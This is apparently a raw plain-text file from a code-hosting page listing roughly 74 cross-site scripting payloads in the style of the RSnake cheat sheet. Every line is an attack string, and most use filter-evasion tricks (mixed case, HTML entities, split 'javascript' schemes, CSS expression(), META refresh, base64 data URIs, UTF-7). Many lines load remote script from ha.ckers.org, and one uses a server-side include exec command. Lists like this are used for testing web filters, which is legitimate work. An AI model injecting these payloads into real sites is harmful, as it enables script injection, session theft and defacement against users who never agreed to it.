74 lines
4.1 KiB
Plaintext
74 lines
4.1 KiB
Plaintext
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||
|
'';!--"<XSS>=&{()}
|
||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||
|
<IMG SRC="javascript:alert('XSS');">
|
||
|
<IMG SRC=javascript:alert('XSS')>
|
||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||
|
<IMG SRC=javascript:alert("XSS")>
|
||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||
|
SRC=
<IMG 6;avascript:alert('XSS')>
|
||
|
<IMG SRC=javascript:alert('XSS')>
|
||
|
<IMG SRC=javascript:alert('XSS')>
|
||
|
<IMG SRC="jav ascript:alert('XSS');">
|
||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||
|
<IMG SRC="  javascript:alert('XSS');">
|
||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||
|
<IMG SRC="javascript:alert('XSS')"
|
||
|
<SCRIPT>a=/XSS/
|
||
|
\";alert('XSS');//
|
||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||
|
<BODY BACKGROUND="javascript:alert('XSS')">
|
||
|
<BODY ONLOAD=alert('XSS')>
|
||
|
<IMG DYNSRC="javascript:alert('XSS')">
|
||
|
<IMG LOWSRC="javascript:alert('XSS')">
|
||
|
<BGSOUND SRC="javascript:alert('XSS');">
|
||
|
<BR SIZE="&{alert('XSS')}">
|
||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||
|
<IMG SRC="mocha:[code]">
|
||
|
<IMG SRC="livescript:[code]">
|
||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||
|
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||
|
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
||
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||
|
<BASE HREF="javascript:alert('XSS');//">
|
||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||
|
getURL("javascript:alert('XSS')")
|
||
|
a="get";
|
||
|
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||
|
<HTML><BODY>
|
||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||
|
<? echo('<SCR)';
|
||
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||
|
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||
|
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|